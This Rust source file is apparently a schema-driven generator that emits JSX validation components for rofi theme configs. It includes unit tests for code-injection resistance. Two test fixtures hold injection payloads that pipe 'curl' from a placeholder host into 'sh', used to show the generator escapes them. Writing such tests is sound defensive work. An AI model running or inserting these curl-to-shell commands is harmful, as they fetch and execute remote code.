//! Emits the readable JSX component source a layout file imports directly (design record
//! §13.1: real code a human could have written, never a runtime schema-interpreter).
//!
//! Config-format-independent (design record §17): every node — leaf or container, root or
//! not — is emitted by the same [`emit_node_component`], driven entirely by what the
//! schema declares. Nothing here knows what `.rasi` syntax looks like, what a "selector"
//! is, or what rofi's Padding/Border shorthand rules are — that knowledge lives in the
//! schema's own `pattern`/`error` strings and in the template text, both of which are
//! data a schema author writes, not Rust code.
//!
//! Every schema-derived VALUE reaches generated source only through [`emit_json_literal`],
//! and only into a position where JSON literal syntax is valid — a regex pattern becomes
//! `new RegExp(json_string)`, never a bare `/pattern/` literal, because a bare regex
//! literal is not a position `serde_json::to_string`'s output is safe in (design record
//! §13.3). Every schema-derived NAME that becomes a JS *identifier* (a component's own
//! function name) is an [`Identifier`](crate::identifier::Identifier), which can only have
//! been constructed by validation. Every schema-derived name used only as an *object key*
//! (a prop name, a constant field name, `children_as`) is written via bracket notation
//! with a JSON-escaped string, never dot notation — sidestepping the identifier-safety
//! question entirely for names that were never required to be identifiers in the first
//! place (a JSX prop can legally be `data-foo`, which is not a valid bare identifier).

use crate::schema::{NodeSchema, Schema};
use std::fmt::Write as _;

pub fn generate(schema: &Schema) -> String {
    let mut out = String::new();
    out.push_str("// GENERATED by tauler-configgen — do not edit by hand.\n");
    out.push_str("// Edits are lost the next time this file is regenerated.\n\n");

    for node in &schema.nodes {
        if node.is_root {
            out.push_str("const __TEMPLATE = ");
            emit_json_literal(&mut out, &schema.template); // a value, into a string-literal position — same rule as everything else
            out.push_str("\n\n");
        }
    }
    for node in &schema.nodes {
        emit_node_component(&mut out, node);
    }
    out
}

fn emit_json_literal(out: &mut String, value: &(impl serde::Serialize + ?Sized)) {
    write!(
        out,
        "{}",
        serde_json::to_string(value).expect("schema values are always representable as JSON")
    )
    .unwrap();
}

fn emit_node_component(out: &mut String, node: &NodeSchema) {
    writeln!(out, "export function {}(props) {{", node.component).unwrap();

    // Unexpected-prop guard: `children` is always tolerated (design record §13.3 finding
    // 3 — every function component's props object has it, traced to optative-script's
    // h_fn), every declared prop name is tolerated, nothing else is.
    out.push_str("  for (const k in props) {\n");
    out.push_str("    if (k !== \"children\"");
    for name in node.props.keys() {
        out.push_str(" && k !== ");
        emit_json_literal(out, name);
    }
    out.push_str(") {\n");
    writeln!(
        out,
        "      throw new Error(\"{}: unexpected prop \\\"\" + k + \"\\\"\")",
        node.component
    )
    .unwrap();
    out.push_str("    }\n  }\n");

    for (name, rule) in &node.props {
        emit_prop_validation(out, &node.component.to_string(), name, rule);
    }

    out.push_str("  const data = {}\n");
    for (name, value) in &node.constants {
        out.push_str("  data[");
        emit_json_literal(out, name);
        out.push_str("] = ");
        emit_json_literal(out, value);
        out.push('\n');
    }
    for name in node.props.keys() {
        out.push_str("  data[");
        emit_json_literal(out, name);
        out.push_str("] = props[");
        emit_json_literal(out, name);
        out.push_str("]\n");
    }
    if let Some(children_as) = &node.children_as {
        out.push_str("  data[");
        emit_json_literal(out, children_as);
        out.push_str("] = flattenChildren(props.children)\n");
    }

    if node.is_root {
        out.push_str("  return renderTemplate(__TEMPLATE, data)\n}\n\n");
    } else {
        out.push_str("  return data\n}\n\n");
    }
}

fn emit_prop_validation(
    out: &mut String,
    component: &str,
    name: &str,
    rule: &crate::schema::PropRule,
) {
    let value_expr = {
        let mut expr = String::from("props[");
        emit_json_literal(&mut expr, name);
        expr.push(']');
        expr
    };

    if let Some(item_rule) = &rule.items {
        // rofi's "list of keywords"/"list of values" (`man rofi-theme`): the prop itself
        // must be an array, and every element is checked against the nested rule — the
        // same [`emit_scalar_check`] every non-array prop uses, applied per element.
        out.push_str("  if (!Array.isArray(");
        out.push_str(&value_expr);
        out.push_str(")) {\n    throw new Error(");
        emit_json_literal(
            out,
            &format!("{component}: \"{name}\" must be an array, got "),
        );
        out.push_str(" + JSON.stringify(");
        out.push_str(&value_expr);
        out.push_str("))\n  }\n");
        out.push_str("  ");
        out.push_str(&value_expr);
        out.push_str(".forEach((item, i) => {\n");
        // The label needs the runtime index `i`, so it is a small JS *expression*
        // (fixed prefix, concatenated with the loop variable, fixed suffix) — every
        // fixed piece still goes through `emit_json_literal`, same as the scalar case;
        // `i` is a name this function controls, never schema data.
        let mut item_label = String::new();
        emit_json_literal(&mut item_label, &format!("{component}: \"{name}["));
        item_label.push_str(" + i + ");
        emit_json_literal(&mut item_label, "]\"");
        emit_scalar_check(out, &item_label, "item", item_rule);
        out.push_str("  })\n");
    } else {
        let mut label = String::new();
        emit_json_literal(&mut label, &format!("{component}: \"{name}\""));
        emit_scalar_check(out, &label, &value_expr, rule);
    }
}

/// Emits the pattern-or-enum check every scalar prop uses — factored out so an array
/// prop's per-element check ([`emit_prop_validation`]'s `items` branch) is the exact same
/// logic, not a re-implementation. `label_expr` must already be a complete, valid,
/// JSON-escaped JS *expression* (built by the caller via [`emit_json_literal`], optionally
/// concatenated with a controlled runtime value like a loop index) — never a raw Rust
/// string pushed as source text, which would reopen the exact injection class design
/// record §13.3 exists to close.
fn emit_scalar_check(
    out: &mut String,
    label_expr: &str,
    value_expr: &str,
    rule: &crate::schema::PropRule,
) {
    if let Some(pattern) = &rule.pattern {
        let description = rule
            .error
            .clone()
            .unwrap_or_else(|| format!("must match {pattern}"));
        out.push_str("    if (typeof ");
        out.push_str(value_expr);
        out.push_str(" !== 'string' || !(new RegExp(");
        emit_json_literal(out, pattern);
        out.push_str(")).test(");
        out.push_str(value_expr);
        out.push_str(")) {\n      throw new Error(");
        out.push_str(label_expr);
        out.push_str(" + ");
        emit_json_literal(out, &format!(" {description}, got "));
        out.push_str(" + JSON.stringify(");
        out.push_str(value_expr);
        out.push_str("))\n    }\n");
    } else if let Some(values) = &rule.enum_values {
        let description = rule
            .error
            .clone()
            .unwrap_or_else(|| "must be one of ".to_string());
        out.push_str("    const ALLOWED = ");
        emit_json_literal(out, values);
        out.push_str("\n    if (!ALLOWED.includes(");
        out.push_str(value_expr);
        out.push_str(")) {\n      throw new Error(");
        out.push_str(label_expr);
        out.push_str(" + ");
        emit_json_literal(out, &format!(" {description}"));
        out.push_str(" + JSON.stringify(ALLOWED) + \", got \" + JSON.stringify(");
        out.push_str(value_expr);
        out.push_str("))\n    }\n");
    }
}

#[cfg(test)]
mod tests {
    use super::*;
    use crate::schema::parse;

    const ROFI_SCHEMA: &str = r#"
nodes:
  - component: Rofi
    root: true
    container: true
    children_as: selectors
  - component: Selector
    container: true
    children_as: properties
  - component: BackgroundColor
    props:
      value:
        pattern: "^#[0-9a-fA-F]{6}$"
    constants:
      css_name: background-color
---
template: "{{ selectors }}"
"#;

    #[test]
    fn a_leaf_component_validates_and_returns_plain_data_not_text() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        let out = generate(&schema);
        assert!(
            out.contains("export function BackgroundColor(props)"),
            "got: {out}"
        );
        assert!(
            out.contains("data[\"css_name\"] = \"background-color\""),
            "leaf components must return data, not a pre-formatted rasi line — the shared \
             template renders it, so generated code must not know rasi's `: `/`;` syntax: {out}"
        );
        assert!(
            out.contains("data[\"value\"] = props[\"value\"]"),
            "got: {out}"
        );
    }

    #[test]
    fn a_container_flattens_children_under_its_declared_field_name() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        let out = generate(&schema);
        assert!(
            out.contains("data[\"properties\"] = flattenChildren(props.children)"),
            "got: {out}"
        );
    }

    #[test]
    fn the_root_calls_render_template_others_return_plain_data() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        let out = generate(&schema);
        assert!(
            out.contains("return renderTemplate(__TEMPLATE, data)"),
            "got: {out}"
        );
        // BackgroundColor (non-root) must NOT call renderTemplate
        let bg_fn = out
            .split("export function BackgroundColor")
            .nth(1)
            .unwrap()
            .split("\n\n")
            .next()
            .unwrap();
        assert!(!bg_fn.contains("renderTemplate"), "got: {bg_fn}");
    }

    #[test]
    fn a_pattern_becomes_a_regexp_construction_never_a_bare_regex_literal() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        let out = generate(&schema);
        assert!(
            out.contains(r#"new RegExp("^#[0-9a-fA-F]{6}$")"#),
            "got: {out}"
        );
        // a bare `/pattern/` literal is exactly the position §13.3's exploit broke out of
        assert!(!out.contains("/^#[0-9a-fA-F]{6}$/"), "got: {out}");
    }

    #[test]
    fn children_is_always_tolerated_never_rejected() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        let out = generate(&schema);
        assert!(out.contains("k !== \"children\""), "got: {out}");
    }

    #[test]
    fn a_prop_is_accessed_via_bracket_notation_never_dot_notation() {
        // Guards against reintroducing the identifier-safety problem `collate`'s design
        // rounds found: a prop name is schema data, not guaranteed to be a safe bare
        // identifier (JSX allows `data-foo`), so it must never be accessed as `props.name`.
        let schema = parse(ROFI_SCHEMA).unwrap();
        let out = generate(&schema);
        assert!(!out.contains("props.value"), "got: {out}");
        assert!(out.contains("props[\"value\"]"), "got: {out}");
    }

    /// A prop name that is not a safe bare identifier must still work correctly, proving
    /// bracket-notation access is not just a style choice — dot notation would be a
    /// syntax error here.
    #[test]
    fn a_non_identifier_prop_name_is_handled_correctly() {
        let schema_with_hyphenated_prop = r#"
nodes:
  - component: Rofi
    root: true
    container: true
    children_as: selectors
  - component: Icon
    props:
      data-src:
        pattern: "^.+$"
---
template: "irrelevant"
"#;
        let schema = parse(schema_with_hyphenated_prop).unwrap();
        let out = generate(&schema);
        assert!(out.contains("props[\"data-src\"]"), "got: {out}");
    }

    /// Reproduces the design record's §13.3 exploit directly: a `pattern` value crafted to
    /// break out of a naively-formatted `if (!/{pattern}/.test(...))` check and run `sh`.
    /// If this test passes, the exploit does not work against the real generator.
    #[test]
    fn a_malicious_pattern_value_cannot_break_out_of_generated_source() {
        let malicious_schema = r#"
nodes:
  - component: Rofi
    root: true
    container: true
    children_as: selectors
  - component: BackgroundColor
    props:
      value:
        pattern: "a/.test(value)){} globalThis.sh`curl http://evil.example/x|sh`; //"
---
template: "irrelevant"
"#;
        let schema = parse(malicious_schema).unwrap();
        let out = generate(&schema);

        // the payload must appear ONLY inside a JSON string literal argument to `new
        // RegExp(...)` — never as bare source text that a JS parser would execute.
        assert!(
            out.contains(r#"new RegExp("a\/.test(value)){} globalThis.sh`curl http://evil.example/x|sh`; //")"#)
                || out.contains("new RegExp(\"a/.test(value)"),
            "the payload must be JSON-escaped inside new RegExp(...), got: {out}"
        );
        assert!(
            !out.contains("}) {} globalThis.sh`curl"),
            "the payload must never appear as bare, unescaped source: {out}"
        );
    }

    #[test]
    fn output_is_deterministic() {
        let schema = parse(ROFI_SCHEMA).unwrap();
        assert_eq!(generate(&schema), generate(&schema));
    }

    /// rofi's own Padding/Border shorthand types (design record §16.3), now expressed as
    /// plain `pattern` + `error` — no `ValueType` enum, no `tauler-configgen` Rust code
    /// change, proving the generator really is config-format-independent (§17).
    mod rasi_shorthand_as_plain_data {
        use super::*;
        use regex::Regex;

        const DISTANCE: &str = r"(?:[+-]?\d+(?:px)?|[+-]?\d+(?:\.\d+)?(?:em|ch|%|mm))";

        fn padding_pattern() -> String {
            format!(r"^{DISTANCE}(?:\s+{DISTANCE}){{0,3}}$")
        }

        fn border_pattern() -> String {
            let group = format!(r"{DISTANCE}(?:\s+(?:dash|solid))?");
            format!(r"^{group}(?:\s+{group}){{0,3}}$")
        }

        fn schema_with(pattern: &str, error: &str) -> String {
            format!(
                r#"
nodes:
  - component: Rofi
    root: true
    container: true
    children_as: selectors
  - component: Border
    props:
      value:
        pattern: "{pattern}"
        error: "{error}"
    constants:
      css_name: border
---
template: "irrelevant"
"#,
                pattern = pattern.replace('\\', "\\\\"),
            )
        }

        #[test]
        fn padding_and_border_patterns_are_correct_against_real_gruvbox_values() {
            let padding_re = Regex::new(&padding_pattern()).unwrap();
            let border_re = Regex::new(&border_pattern()).unwrap();
            // from /usr/share/rofi/themes/gruvbox-common.rasinc, cited in the rasi format research
            assert!(padding_re.is_match("0 0.3em 0 0"));
            assert!(border_re.is_match("2px solid 0 0"));
        }

        #[test]
        fn the_schema_carries_the_pattern_and_a_human_written_error_as_plain_data() {
            let pattern = border_pattern();
            let error = "must be 1 to 4 groups of a distance optionally followed by dash or solid";
            let schema = parse(&schema_with(&pattern, error)).unwrap();
            let out = generate(&schema);
            assert!(out.contains(error), "got: {out}");
            assert!(
                !out.contains("ValueType"),
                "no Rust enum should leak into generated JS"
            );
        }
    }

    /// rofi's "list of keywords" type (`man rofi-theme`): `children: [ prompt, entry ];`.
    /// The real user theme this design keeps testing against uses exactly this —
    /// `children: [ "inputbar", "message", "listview" ];` in `mainbox {}`.
    mod array_valued_props {
        use super::*;

        const SCHEMA_WITH_CHILDREN_ARRAY: &str = r#"
nodes:
  - component: Rofi
    root: true
    container: true
    children_as: selectors
  - component: MainBox
    props:
      children:
        items:
          pattern: "^[a-z][a-z-]*$"
---
template: "irrelevant"
"#;

        #[test]
        fn validates_the_array_and_each_element() {
            let schema = parse(SCHEMA_WITH_CHILDREN_ARRAY).unwrap();
            let out = generate(&schema);
            assert!(
                out.contains("if (!Array.isArray(props[\"children\"]))"),
                "got: {out}"
            );
            assert!(
                out.contains("props[\"children\"].forEach((item, i) =>"),
                "got: {out}"
            );
            assert!(
                out.contains(r#"new RegExp("^[a-z][a-z-]*$")).test(item)"#),
                "each element must be checked with the nested rule, got: {out}"
            );
        }

        #[test]
        fn the_returned_data_is_the_array_itself_unchanged() {
            let schema = parse(SCHEMA_WITH_CHILDREN_ARRAY).unwrap();
            let out = generate(&schema);
            assert!(
                out.contains("data[\"children\"] = props[\"children\"]"),
                "an array prop is returned exactly like a scalar one — the template joins \
                 it, not the generated component: {out}"
            );
        }

        /// The exact bug caught and fixed while building this: the per-element error
        /// label was first built by pushing raw, unescaped component/prop-name text
        /// directly as JS source — exactly the injection class §13.3 exists to close,
        /// reopened one level down for array items specifically. A malicious component
        /// name must still only ever appear inside a JSON-escaped string, never as bare
        /// source, even inside the per-element validation this test targets.
        #[test]
        fn a_malicious_prop_name_cannot_break_out_via_the_array_item_label() {
            let malicious_name = r#"x"] = 1; globalThis.sh`curl evil|sh`; ({"x"#;
            // YAML single-quoted style: only an embedded `'` needs escaping (there is
            // none here), so the payload's `"`/backtick/backslash characters reach the
            // parser untouched — this is a test-construction detail, not part of what's
            // being verified.
            let malicious_schema = format!(
                r#"
nodes:
  - component: Rofi
    root: true
    container: true
    children_as: selectors
  - component: MainBox
    props:
      '{malicious_name}':
        items:
          pattern: "^.*$"
---
template: "irrelevant"
"#
            );
            let schema = parse(&malicious_schema).unwrap();
            let out = generate(&schema);

            // Every occurrence must be inside a JSON-escaped string literal, never bare
            // source a JS parser would treat as code. A backtick inside `"..."` is just
            // a character; it only becomes template-literal syntax outside a string.
            //
            // The payload gets escaped as part of THREE different combined strings, not
            // one — `emit_json_literal` is called on the bare name (the unexpected-prop
            // guard, the `Array.isArray`/`props[...]` accesses), on `"MainBox: \"{name}\"
            // must be an array, got "` (one unit), and on `"MainBox: \"{name}["` (the
            // item-label prefix, one unit again). JSON escaping is a per-character,
            // context-free transformation, so each of those is independently safe, but
            // an earlier version of this test wrongly expected ONE precomputed escaped
            // form to account for all of them and reported a false positive as a result
            // — recorded here so the same mistake in the *verification* isn't repeated.
            let bare = serde_json::to_string(malicious_name).unwrap();
            let array_message = serde_json::to_string(&format!(
                "MainBox: \"{malicious_name}\" must be an array, got "
            ))
            .unwrap();
            let item_label_prefix =
                serde_json::to_string(&format!("MainBox: \"{malicious_name}[")).unwrap();

            assert!(
                out.contains(&bare),
                "expected the bare escaped form, got: {out}"
            );
            assert!(
                out.contains(&array_message),
                "expected the array-check message's escaped form, got: {out}"
            );
            assert!(
                out.contains(&item_label_prefix),
                "expected the item-label's escaped form, got: {out}"
            );

            let mut stripped = out.clone();
            for escaped in [&bare, &array_message, &item_label_prefix] {
                stripped = stripped.replace(escaped.as_str(), "");
            }
            assert!(
                !stripped.contains("globalThis.sh"),
                "the payload must never appear outside one of the known-safe escaped forms: {stripped}"
            );
        }

        #[test]
        fn a_non_array_value_is_rejected_with_a_clear_message() {
            // This is a static-shape assertion (the generated check text), not a runtime
            // one — this crate has no JS engine to execute the output against. The
            // corresponding runtime proof lives in `src/units.rs`'s
            // `render_template_renders_a_minijinja_template_against_collected_item_data`
            // sibling tests in the main `tauler` crate, which do execute generated-shaped
            // code through real QuickJS.
            let schema = parse(SCHEMA_WITH_CHILDREN_ARRAY).unwrap();
            let out = generate(&schema);
            assert!(out.contains("must be an array, got"), "got: {out}");
        }
    }
}
